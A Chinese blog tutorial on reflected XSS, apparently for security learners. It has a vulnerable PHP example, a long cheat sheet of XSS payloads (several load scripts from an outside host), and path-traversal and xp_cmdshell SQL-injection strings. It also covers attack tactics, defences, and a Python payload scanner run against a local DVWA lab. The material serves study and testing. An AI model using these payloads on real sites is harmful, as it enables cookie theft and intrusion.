反射型xss漏洞总结和python脚本复现

最新推荐文章于 2024-05-21 11:18:00 发布
最新推荐文章于 2024-05-21 11:18:00 发布
阅读量401 收藏 3
点赞数
文章标签: xss python 前端 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Azehng/article/details/133957673
版权

XSS漏洞学习总结

1.什么是xss漏洞

<?php
if(isset($_GET['content'])){
    $content=$_GET['content'];
    echo "你输入的内容是$content";
}else{
    echo "请输入正确的参数content";
}
?>

访问该页面,并以GET方式给content参数赋值,页面响应如下

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

当我们输入<script>alert(1)</script>,页面响应如下

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

上面就是xss漏洞的体现场景,也算一种注入漏洞。

跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击,XSS又分为:存储型 、反射型 、DOM型XSS。

再尝试下面的payload试试

<script>var res = 0;for(var i = 10;i>=0;i--){res -= i;}alert(res)</script>

不仅如此,在一些事件中也可以触发xss漏洞,比如:

onclick;onerror;onmouseover;onload等,其他标签也可以尝试<img src=></img><a href=''></a>

content=<img src="smiley-2.gif" alt="Go to W3CSchool.cc!" onerror=alert('watchout!') width="420" height="420" border="0">

2.xss危害及常见攻击payload

  1. 窃取用户Cookie
  2. 后台增删改文章
  3. 钓鱼攻击
  4. 利用XSS漏洞进行传播和修改网页代码
  5. XSS蠕虫攻击
  6. 网站重定向
  7. 获取键盘记录
  8. 获取用户信息等
'><script>alert(document.cookie)</script>
 ='><script>alert(document.cookie)</script>
 <script>alert(document.cookie)</script>
 <script>alert(vulnerable)</script>
 %3Cscript%3Ealert('XSS')%3C/script%3E
 <script>alert('XSS')</script>
 <img src="javascript:alert('XSS')">
 %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
 %22%3cscript%3ealert(%22xss%22)%3c/script%3e
 %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
 %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
 %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
 %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
 %3f.jsp
 %3f.jsp
 <script>alert('Vulnerable');</script>
 <script>alert('Vulnerable')</script>
 ?sql_debug=1
 a%5c.aspx
 a.jsp/<script>alert('Vulnerable')</script>
 a/
 a?<script>alert('Vulnerable')</script>
 "><script>alert('Vulnerable')</script>
 ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
 %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 %3Cscript%3Ealert(document. domain);%3C/script%3E&
 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
 <IMG src="javascript:alert('XSS');">
 <IMG src=javascript:alert('XSS')>
 <IMG src=JaVaScRiPt:alert('XSS')>
 <IMG src=JaVaScRiPt:alert("XSS")>
 <IMG src=javascript:alert('XSS')>
 <IMG src=javascript:alert('XSS')>
 <IMG src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
 <IMG src="jav ascript:alert('XSS');">
 <IMG src="jav ascript:alert('XSS');">
 <IMG src="jav ascript:alert('XSS');">
 "<IMG src=java\0script:alert(\"XSS\")>";' > out
 <IMG src=" javascript:alert('XSS');">
 <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
 <BODY BACKGROUND="javascript:alert('XSS')">
 <BODY ONLOAD=alert('XSS')>
 <IMG DYNSRC="javascript:alert('XSS')">
 <IMG LOWSRC="javascript:alert('XSS')">
 <BGSOUND src="javascript:alert('XSS');">
 <br size="&{alert('XSS')}">
 <LAYER src="http://xss.ha.ckers.org/a.js"></layer>
 <LINK REL="stylesheet" href="javascript:alert('XSS');">
 <IMG src='vbscript:msgbox("XSS")'>
 <IMG src="mocha:[code]">
 <IMG src="livescript:[code]">
 <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
 <IFRAME src=javascript:alert('XSS')></IFRAME>
 <FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>
 <TABLE BACKGROUND="javascript:alert('XSS')">
 <DIV STYLE="background-image: url(javascript:alert('XSS'))">
 <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">
 <DIV STYLE="width: expression(alert('XSS'));">
 <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
 <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
 <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
 <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>
 <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
 <BASE href="javascript:alert('XSS');//">
 getURL("javascript:alert('XSS')")
 a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
 <XML src="javascript:alert('XSS');">
 "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
 <SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
 <IMG src="javascript:alert('XSS')"
 <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->
 <IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
 <SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>
 <SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>

3.xss攻击思路

  1. 测试输入是否回显在浏览器页面。

  2. 尝试输入<>""等字符,查看是否被转义。

  3. 输出在script标签内,则插入语法正确的payload尝试;若输出回显在字符串内,可以尝试使用双引号、单引号进行闭合。

  4. 输出在html属性标签内,尝试进行闭合,在添加新属性,如onclick等事件。如字符被html实体编码,则html在解析是会自动进行实体解码,可以尝试任意字符实体编码进行注入。

  5. 输出在js内,空格被过滤,尝试使用/**/代替空格(%0A),或者对后续代码进行注释。+:%2B

  6. 输出在js注释内,设法插入%0A,%0D等,尝试逃逸出来。

  7. 输出在js字符串内:尝试进行十六进制编码,base64编码。

4.xss防御思路

  1. 对输入和url参数做白名单过滤。
  2. 特殊字符进行转义。
  3. html字符实体编码
  4. 对输出内容进行编码和转义

5.xss简单python脚本实现

其实xss的python脚本实现,核心思想就是输入能否被回显,利用这一点,尝试遍历xss字典,如果有payload完整回显,就可能存在xss漏洞。

以下是我在本地搭建的dvwa靶场,进行xss简单的扫描。

import requests

url_tset = "http://dvwa/vulnerabilities/xss_r/?name=hello";
# cookie="PHPSESSID=4qurffd5vvn1ej8lf95b8cv432;security=low"
cookie1 = {'PHPSESSID': '4qurffd5vvn1ej8lf95b8cv432', 'security': 'low'}
cookie2 = {'PHPSESSID': '4qurffd5vvn1ej8lf95b8cv432', 'security': 'medium'}



def xss_scan(target,cookie):
    url = target.split('?')[0]
    paraList = target.split('?')[1]  # name=hello
    key = paraList.split('=')[0]  # name
    # print(key)
    # print(paraList)
    # payload = paraList.split('=')[1]  #hello
    with open('xsspayload.txt', 'r') as f:
        payload_list = f.readlines();

    for payload in payload_list:
        # print(payload)
        response = requests.get(url=url, params={key: payload.strip()}, cookies=cookie)
        # print(response.txt)
        # print(url + '?' + key + '=' + payload)
        if payload.strip() in response.text:
            print("可能存在注入点,payload为:" + payload)


if __name__ == '__main__':
    # xss_scan(url_tset,cookie1)
    xss_scan(url_tset,cookie2)
Azehng
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python脚本实现Web漏洞扫描工具
12-25
这是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的。以下是使用说明和源代码。 一、使用说明: 1.运行环境: Linux命令行界面+Python2.7 2.程序源码: Vim scanner//建立一个名为scanner的文件 Chmod a+xscanner//修改文件权限为可执行的 3.运行程序: Python scanner//运行文件 若没有携带目标URL信息,界面输出帮助信息,提醒可以可输入的参数。 参数包括: –h 输出帮助信息 –ur
奇安信安全扫描漏洞解决路径遍历和存储xss反射xss攻击漏洞
11-09
亲测可用,中级漏洞,解决服务器段请求伪造 final String forURL = ESAPI.encoder().encodeForURL(url); restTemplate.exchange(forURL, HttpMethod.GET,new HttpEntity<String>(headers), List.class, params);
[学习笔记](Python3)防止SQL注入、XSS攻击和文件上传漏洞
最新发布
可信计算的博客
05-21 468
通过参数化查询防止SQL注入,使用输出编码、CSP、输入验证等技术防止XSS攻击,并在Python3后端通过文件类验证、文件名处理、限制文件大小等措施防止文件上传漏洞,可以有效提高Web应用的安全性。
xss漏洞原因以及如何应对
风烟
01-26 8913
场景一:获取URL参数含有脚本执行 比如我们需要获取URL中某个参数,然后输出到页面当中 比如链接是http://xxx?search="><script>alert('xss')</script>这种,我们解析search参数拼接html的之后直接用了这个参数,这个时候浏览器不知道是恶意代码,直接就执行了, <div> xxx: "><script>alert('xss')</script> </div> 这
XSS漏洞复现
qq_39744805的博客
09-01 1019
跨站脚本( Cross-site Scripting )攻击,攻击者通过网站输入框输入payload(脚本代码 ),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的( 窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML语言中的CSS相混淆,通常称它为“XSS”。
网络安全测试中的跨站点脚本攻击(XSS):Python和FlaskSecurity实现跨站脚本攻击测试
禅与计算机程序设计艺术
07-04 4014
作者:禅与计算机程序设计艺术 《33. 网络安全测试中的跨站点脚本攻击(XSS):Python和Flask-Security实现跨站脚本攻击测试》 引言
复现XSS漏洞及分析
qq_52661813的博客
09-10 830
XSS漏洞概述:跨站脚本攻击XSS(Cross Site Scripting),为区别层叠样式表(Cascading Style Sheets, CSS),所以改写为XSS一:反射特点:1、非持久,不保存到正常服务器的数据库中2、反射XSS的被攻击对象是特定的,使用含有反射XSS的特制URL案例一:类二:存储特点:1、持久,攻击脚本将被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。
YXcms-含有存储XSS漏洞的源码包
03-17
YXcms-含有存储XSS漏洞的源码包,亲测真实有效可用,如有侵权,请联系CSDN管理员删除即可
xss测试工具xsstrike(基于python3)
weixin_50464560的博客
09-19 7126
xsstrike很强 项目地址: https://github.com/s0md3v/XSStrike 1 安装: git clone https://github.com/s0md3v/XSStrike.git 1 使用文档: https://github.com/s0md3v/XSStrike/wiki/Usage usage: xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [-
网络安全】详解XSS漏洞反射XSS漏洞
yyyyyybw的博客
09-25 982
反射XSS漏洞是Web应用程序中常见的安全漏洞,攻击者可利用该漏洞注入恶意代码,窃取用户敏感信息、篡改页面内容、操纵页面行为等。为确保Web应用程序的安全性,应该采取必要措施对输入数据进行严格验证、转义和过滤处理。如果你也想学网络安全,做一个白帽黑客,我为你整理了一套完整的详细的教程资料,戳网络安全(黑客)自学笔记+学习路线+配套视频教程(超详细)t=N7T8。
反射XSS漏洞详解
gb4215287的博客
02-04 2091
反射XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞。通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户。对于开发者而言,使用这种机制非常方便,因为它允许他们从应用程序中调用一个定制的错误页面,而不需要对错误页面中的消息分别进行硬编码。 例如,下面的URL返回如图12-1所示的错误消息: https://wahh-app.co...
Python编写XSS检测脚本
weixin_45605352的博客
05-29 2714
这里只检测GET反射xss,先将url分割,将参数与paylod替换,从页面返回内容中查看是否有paylod语句来判断是否存在反射XSS import requests payload = [] f = open('payload.txt', 'r') for line in f: payload.append(line.strip()) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:
java 反射xss漏洞
06-02
Java反射XSS漏洞是指攻击者利用Java反射机制构造恶意输入,从而触发Web应用程序的反射机制,导致恶意代码被执行的漏洞。攻击者可以通过构造恶意请求,将恶意代码注入到应用程序中,使得用户在访问页面时受到攻击。 为了防止Java反射XSS漏洞的发生,可以采取以下措施: 1. 对用户输入进行严格的校验,包括对输入的内容进行过滤和转义,以确保用户输入不包含任何恶意代码。 2. 使用安全的编程方式,如不直接拼接字符串等,以避免在代码中暴露可执行的字符串。 3. 对反射机制进行严格的控制,只允许调用可信的方法和对象。 4. 及时更新开发框架和组件,以修复已知的漏洞和弱点。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值